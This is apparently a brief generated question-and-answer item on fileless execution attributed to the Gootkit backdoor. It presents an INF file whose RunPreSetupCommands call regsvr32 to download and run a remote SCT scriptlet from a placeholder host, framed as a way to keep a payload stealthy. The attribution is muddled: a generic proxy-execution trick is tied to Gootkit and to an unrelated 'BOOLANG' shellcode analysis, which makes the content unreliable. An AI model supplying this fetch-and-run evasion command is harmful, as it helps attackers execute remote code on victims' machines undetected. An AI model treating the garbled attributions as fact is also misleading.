How can the Gootkit backdoor be used for fileless execution?

The `.inf` file can include `RunPreSetupCommands` that execute arbitrary commands, such as launching `regsvr32` with a remote SCT script. For example, combining `regsvr32 /u /s /i:https://example.com/calc.sct scrobj.dll` allows remote download and execution without writing an executable to disk. This enhances the payload's stealth and flexibility, as noted in the analysis of exploiting shellcode via BOOLANG.